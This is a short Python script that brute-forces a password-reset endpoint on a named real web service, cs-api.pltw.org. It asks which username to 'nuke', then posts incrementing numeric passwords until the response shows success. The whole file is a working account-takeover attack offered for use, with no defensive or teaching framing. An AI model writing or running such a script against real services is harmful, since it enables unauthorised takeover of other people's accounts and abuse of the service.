#!/usr/bin/env python3 import requests username = input("what username should we nuke? ") hacked = False password = 2800 while hacked == False: password += 1 print("password is " + str(password)) reset_url = "https://cs-api.pltw.org/" + username + "/reset?password=" + str(password) print("reset_url is " + reset_url) r = requests.post(reset_url) print("request text is " + r.text) if "Data for endpoint" in r.text: hacked = True